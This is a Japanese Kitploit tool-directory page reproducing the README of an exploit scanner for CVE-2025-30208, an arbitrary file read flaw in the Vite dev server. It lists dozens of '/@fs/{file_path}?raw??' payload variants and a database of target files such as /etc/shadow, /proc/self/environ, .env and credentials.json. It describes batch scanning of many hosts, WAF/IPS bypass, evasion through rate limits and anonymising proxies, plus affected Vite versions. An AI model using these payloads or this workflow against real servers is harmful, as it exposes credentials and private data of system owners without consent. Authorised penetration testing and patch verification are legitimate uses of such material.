Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の重要度の任意ファイル読み取り脆弱性です。 | Kitploit
ツール/GitHubGitHub/themehackers/cve-2025-30208
脆弱性スキャナーペイロード生成エクスプロイト情報収集ウェブセキュリティペネトレーションテスト
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の重要度の任意ファイル読み取り脆弱性です。

リポジトリを見る
101年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 CVE-2025-30208 Vite任意ファイル読み取り脆弱性スキャナー

Python License Security Status Modular

エンタープライズ向け機能を備えたCVE-2025-30208対応の高度な脆弱性スキャナー

Vite任意ファイル読み取り脆弱性検出のためのプロフェッショナルペネトレーションテストツール

🚀 クイックスタート • 📋 機能 • 🔧 使い方 • 📊 例 • 🛡️ セキュリティ


📖 概要

これは、Vite開発サーバーのCVE-2025-30208脆弱性を検出・悪用するために設計された包括的な脆弱性スキャナーです。この脆弱性は、Viteのファイルシステムエンドポイントを通じて任意のファイル読み取りアクセスを可能にし、機密構成ファイル、ソースコード、システム情報を露呈する可能性があります。

🎯 このツールの役割

  • ネットワーク上の脆弱なViteインスタンスを検出
  • 安全に任意ファイル読み取り脆弱性を悪用
  • 機密ファイルや構成データを発見
  • 複数形式(HTML、JSON、コンソール)で結果を報告
  • スキャンセッションと構成を管理
  • 自動リトライ機構でエラーを適切に処理

🏗️ モジュール式アーキテクチャ

このツールは、保守性と拡張性を高めるモジュール式アーキテクチャを採用しています:

  • CVE-2025-30208.py - メインスキャナーアプリケーション
  • payloads.py - 高度なエクスプロイトペイロード(60以上のバリエーション)
  • sensitive_files.py - 包括的な機密ファイルデータベース(200以上のファイル)
  • html_template.py - 強化されたハッカー風HTMLレポートテンプレート

🚀 クイックスタート

前提条件

root@kitploit:~
pip3 install -r requirements.txt

基本的な使い方

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 機能

🔍 コア脆弱性検出

  • 60以上の高度なペイロード: 最大限の検出を実現する包括的なエクスプロイト手法
  • スマート検出: 応答をインテリジェントに分析し、誤検知を回避
  • リアルタイム検証: ターゲット応答の継続的な検証
  • 包括的テスト: 既知のすべての脆弱エンドポイントをテスト

🛡️ 強化されたセキュリティ機能

  • プロキシサポート: 匿名性のためのHTTP/HTTPSプロキシ設定
  • カスタムヘッダー: カスタムHTTPヘッダーによるWAF/IPSのバイパス
  • レート制限: 検出を回避するための設定可能な遅延
  • セッション管理: スキャンセッションの保存と復元
  • 入力検証: 包括的なパラメータ検証

🔧 高度な機能

  • バッチスキャン: マルチスレッドによる複数ターゲットのスキャン
  • 機密ファイル発見: 200以上の機密ファイルを自動発見
  • 接続性テスト: TCP/UDP/HTTP/HTTPSプロトコルテスト
  • エラー回復: 指数バックオフによる自動リトライ
  • 包括的なログ記録: タイムスタンプ付きの詳細ログ

📊 レポートと出力

  • 🎨 強化されたHTMLレポート: アニメーション付きの美しいハッカー風脆弱性レポート
  • JSONエクスポート: さらなる分析のための構造化データ
  • コンソール出力: 色分けされたリアルタイムフィードバック
  • ログファイル: 詳細な監査証跡
  • 対話型Webインターフェース: レポート表示用の組み込みWebサーバー

🔧 使い方ガイド

1. 基本設定

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. 脆弱性テスト

root@kitploit:~
CVE-2025-30208 > run

# 詳細出力のためにverboseモードを有効化
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. バッチスキャン

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Enterキーを2回押して終了]

4. 機密ファイル発見

root@kitploit:~
CVE-2025-30208 > scan

5. 高度な設定

root@kitploit:~
# プロキシの設定
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# カスタムヘッダーの設定
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# レート制限の設定
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. 強化されたHTMLレポート

root@kitploit:~
# 美しいHTMLレポートを生成
CVE-2025-30208 > pull

# レポート表示用のWebサーバーを起動
CVE-2025-30208 > web

# 特定のポートでWebサーバーを起動
CVE-2025-30208 > web 8081

# Webサーバーを停止
CVE-2025-30208 > web off

📊 コマンドリファレンス


⚙️ 設定オプション


🎨 強化されたペイロードシステム

スキャナーは現在、payloads.pyに整理された60以上の異なるペイロードバリエーションを使用しています:

主要 @fs ペイロード

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

拡張パラメータバリエーション

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite固有のバリエーション

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

モジュールシステムバリエーション

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

代替エンドポイント

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 強化された機密ファイル発見

このツールは現在、sensitive_files.pyに整理された200以上の機密ファイルをテストします:

🖥️ システムファイル(Linux/Unix)

  • /etc/passwd - ユーザーアカウント情報
  • /etc/shadow - 暗号化されたパスワードデータ
  • /etc/services - ネットワークサービス
  • /etc/hosts - ホスト名マッピング
  • /etc/fstab - ファイルシステムテーブル
  • /etc/ssh/sshd_config - SSHサーバー設定
  • /etc/crontab - システムcronジョブ
  • /etc/sudoers - sudo設定

📊 プロセス情報

  • /proc/version - カーネルバージョン
  • /proc/cpuinfo - CPU情報
  • /proc/meminfo - メモリ情報
  • /proc/self/environ - プロセス環境変数
  • /proc/self/cmdline - プロセスコマンドライン
  • /proc/net/tcp - TCP接続
  • /proc/net/udp - UDP接続

⚙️ アプリケーション設定

  • .env - 環境変数
  • .env.local - ローカル環境
  • .env.production - 本番環境
  • config.json - アプリケーション設定
  • settings.json - アプリケーション設定
  • application.properties - Spring設定
  • application.yml - YAML設定
  • database.yml - データベース設定
  • secrets.json - シークレット管理

📦 Node.js / JavaScriptファイル

  • package.json - Node.js依存関係
  • package-lock.json - ロックされた依存関係
  • yarn.lock - Yarnロックファイル
  • vite.config.js - Vite設定
  • vite.config.ts - TypeScript Vite設定
  • tsconfig.json - TypeScript設定
  • webpack.config.js - Webpack設定
  • next.config.js - Next.js設定
  • nuxt.config.js - Nuxt.js設定
  • angular.json - Angular設定
  • vue.config.js - Vue.js設定
  • rollup.config.js - Rollup設定
  • eslint.config.js - ESLint設定

🔧 Gitファイル

  • .git/config - Git設定
  • .gitignore - Git無視ルール
  • .gitattributes - Git属性
  • .gitmodules - Gitサブモジュール
  • .git/HEAD - 現在のブランチ
  • .git/logs/HEAD - Gitログ
  • .git/refs/heads/master - masterブランチ
  • .git/refs/heads/main - mainブランチ

📚 ドキュメントファイル

  • README.md - プロジェクトドキュメント
  • CHANGELOG.md - 変更履歴
  • LICENSE - ライセンス情報
  • CONTRIBUTING.md - コントリビューションガイドライン
  • AUTHORS - 著者情報
  • TODO.md - TODOリスト
  • ROADMAP.md - 開発ロードマップ

🐳 Dockerファイル

  • Dockerfile - Docker設定
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - オーバーライド設定
  • .dockerignore - Docker無視ルール
  • docker-compose.prod.yml - 本番環境設定
  • docker-compose.dev.yml - 開発環境設定

🌐 Webサーバー設定

  • nginx.conf - Nginx設定
  • apache2.conf - Apache設定
  • httpd.conf - HTTPデーモン設定
  • .htaccess - Apacheアクセス制御
  • web.config - IIS設定
  • robots.txt - 検索エンジン指示
  • sitemap.xml - サイト構造
  • manifest.json - Webアプリマニフェスト
  • sw.js - Service Worker
  • firebase.json - Firebase設定
  • firebase.rules - Firebaseセキュリティルール

🪟 Windowsファイル

  • boot.ini - ブート設定
  • autoexec.bat - 自動実行スクリプト
  • system.ini - システム設定
  • win.ini - Windows設定
  • Users - ユーザーディレクトリ
  • Windows - システムファイル
  • Program Files - アプリケーションディレクトリ

🍎 macOSファイル

  • System - システムファイル
  • Library - ライブラリファイル
  • Applications - アプリケーションファイル
  • private/etc/hosts - hostsファイル
  • private/etc/passwd - ユーザーアカウント

🗄️ データベースファイル

  • database.db - SQLiteデータベース
  • database.sqlite - SQLiteデータベース
  • data.db - データデータベース
  • dump.sql - データベースダンプ
  • schema.sql - データベーススキーマ
  • migrations - データベースマイグレーション

📝 ログファイル

  • logs - ログディレクトリ
  • error.log - エラーログ
  • access.log - アクセスログ
  • app.log - アプリケーションログ
  • debug.log - デバッグログ
  • combined.log - 結合ログ

💾 バックアップファイル

  • backup - バックアップディレクトリ
  • backup.sql - データベースバックアップ
  • backup.zip - 圧縮バックアップ
  • dump - データダンプ
  • export - データエクスポート

🔒 セキュリティと認証

  • auth.json - 認証設定
  • credentials.json - 資格情報ストレージ
  • keys.json - キー管理
  • tokens.json - トークンストレージ
  • jwt.json - JWT設定
  • oauth.json - OAuth設定

🔌 API・サービスファイル

  • api.json - API設定
  • swagger.json - APIドキュメント
  • openapi.json - OpenAPI仕様
  • graphql.json - GraphQL設定
  • schema.json - APIスキーマ

☁️ クラウド・デプロイメント

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Serverless設定
  • terraform.tf - Terraform設定
  • kubernetes.yml - Kubernetes設定
  • k8s.yml - Kubernetes設定

📊 モニタリング・分析

  • analytics.json - 分析設定
  • monitoring.json - モニタリング設定
  • metrics.json - メトリクス設定
  • telemetry.json - テレメトリデータ

🎨 強化されたHTMLレポート

このツールは現在、美しいハッカー風HTMLレポートを生成します:

✨ ビジュアル機能

  • マトリックス風背景: アニメーションする落下文字
  • グラデーションアニメーションと発光効果
  • ホバー効果付き対話型要素
  • 全デバイス対応のレスポンシブデザイン
  • セキュリティプロフェッショナル向けに最適化されたダークテーマ

📊 対話型統計

  • リアルタイムカウンター: 総リーク数と公開バイト数
  • 重要度インジケーター: 色分け表示
  • 各リークのコピー機能
  • コンテンツプレビュー: サイズと行数表示
  • 詳細分析のための展開可能セクション

🔧 技術機能

  • Google Fonts統合(JetBrains Mono、Orbitron)
  • CSSアニメーションとトランジション
  • JavaScript対話性: ユーザー体験の向上
  • モバイルレスポンシブデザイン
  • クロスブラウザ互換性

🌐 Webサーバー統合

  • レポート表示用の組み込みHTTPサーバー
  • 自動ブラウザ起動
  • ポート設定オプション
  • 簡単な起動・停止コマンド

🛡️ エラー処理と復旧

自動リトライ機構

  • 3回のリトライ試行: 失敗したリクエストは自動的にリトライ
  • 指数バックオフ: リトライ間の遅延を増加
  • スマートエラー分類: エラータイプに応じた異なる処理
  • グレースフルリカバリ: エラー後もツールは動作継続

エラーカテゴリ

  • ネットワークエラー: 接続、タイムアウト、プロキシ問題
  • 設定エラー: 無効な設定やパラメータ
  • 検証エラー: 無効な入力パラメータ
  • スキャナーエラー: 一般的なスキャナーエラー

検証機能

  • リアルタイム入力検証: すべてのパラメータを使用前に検証
  • 設定検証: スキャン前に完全な検証を実施
  • 接続性テスト: TCP/UDP/HTTP/HTTPSプロトコルテスト
  • プロキシ検証: プロキシURL形式の検証

📁 出力ファイル


📝 影響を受けるバージョン

🚨 脆弱なバージョン

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ 影響を受けないバージョン

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ セキュリティと倫理的な使用

⚠️ 重要なセキュリティ注意事項

  • 許可されたテストのみ: 自身が所有する、またはテストする明示的な許可があるシステムでのみ使用してください
  • 責任ある開示: 脆弱性はシステム所有者に報告してください
  • レート制限: ターゲットに過負荷をかけないよう適切な遅延を使用
  • プロキシの使用: 必要に応じて匿名性のためにプロキシの使用を検討
  • 法的順守: 現地の法律と規制の順守を徹底

🔒 ベストプラクティス

  • テスト前に必ず書面による許可を取得
  • 管理された環境でのみ使用
  • すべてのテスト活動を文書化
  • レート制限とシステムリソースを尊重
  • 発見事項を責任を持って報告

🚀 高度な使用例

例1: 包括的なネットワークスキャン

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

例2: プロキシを使用したステルススキャン

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

例3: 強化されたレポートワークフロー

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

例4: 機密ファイル発見

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ プロジェクト構造

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # メインスキャナーアプリケーション
├── payloads.py                # 高度なエクスプロイトペイロード(60以上)
├── sensitive_files.py         # 機密ファイルデータベース(200以上)
├── html_template.py           # 強化されたHTMLレポートテンプレート
├── README.md                  # このドキュメント
├── requirements.txt           # Python依存関係
├── logs/                      # ログファイルディレクトリ
├── data_leak.html            # 生成されたHTMLレポート
├── data_leak.json            # 生成されたJSONレポート
└── session.json              # 保存されたセッション設定

🤝 コントリビューション

このツールの改善への貢献を歓迎します:

  1. リポジトリをフォーク
  2. 機能ブランチを作成
  3. 変更を加える
  4. 十分にテスト
  5. プルリクエストを送信

貢献分野

  • payloads.pyへの新しいペイロードバリエーション
  • sensitive_files.pyへの追加の機密ファイルパターン
  • html_template.pyの強化されたHTMLテンプレート
  • エラー処理の改善
  • パフォーマンス最適化
  • ドキュメントの改善

📄 ライセンス

このプロジェクトは教育目的および許可されたセキュリティテスト目的のみでライセンスされています。

⚠️ 法的免責事項: このツールは許可されたセキュリティテストおよび研究目的のみを対象としています。システムをテストする前に適切な許可を得ていることを確認する責任はユーザーにあります。著者はこのツールの誤用について一切の責任を負いません。


👨‍💻 著者

ThemeHackers

GitHub

セキュリティ研究者&ペネトレーションテスター


⭐ このツールが役に立った場合は、スターを付けてください! ⭐

セキュリティコミュニティのために❤️を込めて作られました

ツールをダウンロード
コマンド説明例
set <option> <value>設定オプションを指定set RHOST 192.168.1.100
show options現在の設定を表示show options
edit対話型オプションエディターedit
run / exploit脆弱性テストを実行run
batch複数ターゲットをバッチスキャンbatch
scan機密ファイルを発見scan
pull結果をHTML/JSONにエクスポートpull
web [on|off|port]HTMLレポート用のWebサーバーweb 8080
saveセッション設定を保存save
loadセッション設定を読み込みload
testターゲットへの接続性をテストtest
validate現在の設定を検証validate
verboseverboseモードの切り替えverbose
proxyプロキシ設定を構成proxy
headersカスタムHTTPヘッダーを設定headers
rateレート制限を構成rate
logログ情報を表示log
help / ?ヘルプを表示help
exit / quitツールを終了exit
オプション説明デフォルト値検証内容
RHOSTターゲットホスト/IPアドレス-ホスト名/IP検証
RPORTターゲットポート番号-ポート範囲(1-65535)
FILEPATHテストするファイルパスetc/passwdパス検証
PROXYHTTP/HTTPSプロキシURL-URL形式検証
VERBOSEverbose出力の有効化false真偽値検証
RATE_LIMITリクエスト間の遅延(秒)0.3数値検証
THREADSバッチスキャンのスレッド数5整数検証
TIMEOUTリクエストタイムアウト(秒)5整数検証
CUSTOM_HEADERSカスタムHTTPヘッダー(JSON){}JSON形式検証
  • prettier.config.js - Prettier設定
  • jest.config.js - Jest設定
  • babel.config.js - Babel設定
  • tailwind.config.js - Tailwind CSS設定
  • ファイル説明形式
    data_leak.html強化されたハッカー風HTML脆弱性レポートHTML
    data_leak.json構造化JSONエクスポートJSON
    sensitive_files_discovery.json発見された機密ファイルJSON
    session.json保存されたセッション設定JSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.log詳細な監査ログテキスト